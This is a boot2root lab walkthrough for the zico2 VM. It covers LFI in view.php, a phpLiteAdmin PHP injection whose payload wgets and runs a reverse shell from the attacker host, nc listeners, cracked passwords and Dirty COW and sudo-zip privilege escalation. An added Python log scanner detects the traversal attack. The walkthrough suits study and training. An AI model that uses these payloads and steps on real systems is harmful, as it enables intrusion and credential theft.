Rooting zico2 Walkthrough

Overview

zico2 is a boot2root virtual machine designed for students to practice vulnerability analysis and exploitation. The objective is to root this virtual machine by exploiting the vulnerabilities present, leading to full system compromise.

Lab Setup:

  • VMware Workstation for the virtual machines
  • Kali Linux VM in Bridge mode
  • zico2 in Bridge mode

Tools Used:

  • Kali Linux VM
  • netdiscover
  • nmap
  • gcc
  • pentestmonkey PHP reverse shell

Vulnerabilities Exploited:

  • Default password
  • Local file inclusion and phpLiteAdmin RCE
  • Password misconfiguration
  • Linux Kernel 2.6.22 < 3.9 – ‘Dirty COW’ ‘PTRACE_POKEDATA’ Race Condition Privilege Escalation (/etc/passwd Method)
  • sudo misconfiguration

Reconnaissance

#netdiscover

Target VM IP Address: 192.168.8.104

Scanning

nmap

nmap -p- -A 192.168.8.104

Nmap findings:

  • Target box is a Linux machine
  • SSH on port 22
  • Web server on port 80

Exploit path 1 for shell: LFI, phpLiteAdmin RCE

Let's explore the website in a browser.

Found an LFI (the page parameter of view.php).

Other than the LFI, nothing fancy. Let's explore the website with DirBuster.

I found the dbadmin directory with DirBuster.

http://192.168.8.105/dbadmin/ is “phpLiteAdmin v1.9.3”

Googling "phpLiteAdmin v1.9.3" vulnerabilities turned up the default password "admin" along with other vulnerabilities.

Logged into phpLiteAdmin with the "admin" password.

phpLiteAdmin v1.9.3 has other vulnerabilities that we will exploit.

Before that, let's check whether we can crack the test users' password hashes and reuse those passwords for SSH.

MD5 hashes cracked online:

root:653F4B285089453FE00E2AAFAC573414:34kroot34

zico:96781A607F4E9F5F423AC01F0DAB0EBD:zico2215@

These username:password pairs are not reusable over SSH.

Next target is the phpLiteAdmin v1.9.3 vulnerabilities. Let's google!

Let's exploit PHP remote code execution in phpLiteAdmin.

Before exploiting the SQL injection on the server, let's host reverse-shell.php on the attacking machine (192.168.8.105):

http://192.158.8.105/shell.txt

and also start an nc reverse connection handler on the attacking machine:

nc -nvlp 1234

Configuration on the attacking machine is complete.

Now, attacking the target box, I created a database sahi and renamed it to sahi.php.

Then created a table with a text column and set its default value to our code:

<?php system("wget 192.168.8.105/shell.txt -O /usr/databases/shell4.php; php /usr/databases/shell4.php"); ?>

Access the database file from the browser:

http://192.168.8.104/view.php?page=../../../../../../../../usr/databases/sahi.php

We received the reverse shell connection.

Let's break out of the restricted shell:
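As an added defensive check, not part of the original walkthrough: a small Python scanner over constructed Apache access-log lines that flags the traversal pattern used against view.php above. It undoes repeated percent-encoding before matching and rates higher any request whose resolved target is a .php file, which is what the renamed sahi.php database looks like from the web server's side. The log lines and the analyse_line/scan names are my own.

```python
import re
from urllib.parse import unquote, urlsplit, parse_qsl
# Apache "combined" format prefix: client ident user [time] "METHOD target HTTP/x" status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)
TRAVERSAL_RE = re.compile(r'\.\.[\\/]')

def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding so ..%2f and %252e%252e%252f are both seen as ../"""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def analyse_line(line):
    """Return a finding dict if any query parameter carries a traversal sequence, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    query = urlsplit(m.group("target")).query
    for param, raw in parse_qsl(query, keep_blank_values=True):
        value = fully_decode(raw)
        if not TRAVERSAL_RE.search(value):
            continue
        # Strip the traversal prefix to see which file the request resolves to.
        resolved = "/" + re.sub(r"^(\.\.[\\/])+", "", value)
        # Including a .php file via traversal means executing attacker-placed code (sahi.php trick).
        severity = "high" if resolved.lower().endswith(".php") else "medium"
        return {"ip": m.group("ip"), "status": int(m.group("status")),
                "param": param, "resolved": resolved, "severity": severity}
    return None

def scan(log_text):
    return [f for f in (analyse_line(l) for l in log_text.splitlines()) if f]

# Constructed sample lines in the style of the walkthrough's traffic (not real log data).
SAMPLE_LOG = """\
192.168.8.105 - - [10/Jun/2017:12:00:01 +0000] "GET /view.php?page=tools.html HTTP/1.1" 200 1024
192.168.8.105 - - [10/Jun/2017:12:00:07 +0000] "GET /view.php?page=../../../../../../../../etc/passwd HTTP/1.1" 200 2048
192.168.8.105 - - [10/Jun/2017:12:00:30 +0000] "GET /view.php?page=..%2F..%2F..%2F..%2Fusr%2Fdatabases%2Fsahi.php HTTP/1.1" 200 77
192.168.8.105 - - [10/Jun/2017:12:01:02 +0000] "GET /view.php?page=%252e%252e%252fetc%252fshadow HTTP/1.1" 403 220
"""

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A status of 200 on a flagged line means the include most likely succeeded; a 403 shows the request was blocked but still records the attempt.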

python -c "import pty; pty.spawn('/bin/bash');"

Exploring /home/zico/wordpress/wp-config.php, we found the database connection settings:

username:zico

password:sWfCsfJSPV9H3AmQzw8

Let's log in to SSH with this username and password.

Privilege Escalation 1: Linux Kernel 2.6.22 < 3.9 – 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation

Let's compile and root using this exploit: https://www.exploit-db.com/exploits/40839/

Congrats! We are root.

Privilege Escalation 2: System misconfiguration.

The zip utility is granted sudo privileges. zip can execute system commands, and because it runs with sudo, every command it spawns runs as root when zip is invoked with sudo. So let's invoke a shell!

Congrats, we are root a second time!
